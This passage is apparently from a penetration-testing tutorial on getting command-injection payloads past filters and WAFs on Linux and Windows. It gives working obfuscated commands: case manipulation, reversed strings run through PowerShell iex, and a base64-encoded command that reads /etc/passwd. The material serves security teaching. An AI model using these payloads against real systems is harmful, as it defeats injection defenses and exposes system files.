One command obfuscation technique we can use is case manipulation, like inverting the character cases of a command (e.g. WHOAMI) or alternating between cases (e.g. WhOaMi). This usually works because a command blacklist may not check for different case variations of a single word, as Linux systems are case-sensitive.
If we are dealing with a Windows server, we can change the casing of the characters of the command and send it. In Windows, commands for PowerShell and CMD are case-insensitive, meaning they will execute the command regardless of what case it is written in:
WhOaMi$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")Once we replace the spaces with tabs (%09), we see that the command works perfectly:
$(a="WhOaMi";printf %s "${a,,}")Reversed Commands
echo 'whoami' | rev$(rev<<<'imaohw') If you wanted to bypass a character filter with the above method, you’d have to reverse them as well, or include them when reversing the original command.
The same can be applied in Windows. We can first reverse a string, as follows:
"whoami"[-1..-20] -join ''We can now use the below command to execute a reversed string with a PowerShell sub-shell (iex "$()"), as follows:
iex "$('imaohw'[-1..-20] -join '')"Encoded Commands
The final technique we will discuss is helpful for commands containing filtered characters or characters that may be URL-decoded by the server. This may allow for the command to get messed up by the time it reaches the shell and eventually fails to execute. Instead of copying an existing command online, we will try to create our own unique obfuscation command this time. This way, it is much less likely to be denied by a filter or a WAF. The command we create will be unique to each case, depending on what characters are allowed and the level of security on the server.
We can utilize various encoding tools, like base64 (for b64 encoding) or xxd (for hex encoding). Let’s take base64 as an example. First, we’ll encode the payload we want to execute (which includes filtered characters):
echo -n 'cat /etc/passwd | grep 33' | base64 bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)Note that we are using <<< to avoid using a pipe |, which is a filtered character.
Even if some commands were filtered, like bash or base64, we could bypass that filter with the techniques we discussed in the previous section (e.g., character insertion), or use other alternatives like sh for command execution and openssl for b64 decoding, or xxd for hex decoding.
We use the same technique with Windows as well. First, we need to base64 encode our string, as follows:
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))echo -n whoami | iconv -f utf-8 -t utf-16le | base64iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"In addition to the techniques we discussed, we can utilize numerous other methods, like wildcards, regex, output redirection, integer expansion, and many others. We can find some such techniques on PayloadsAllTheThings.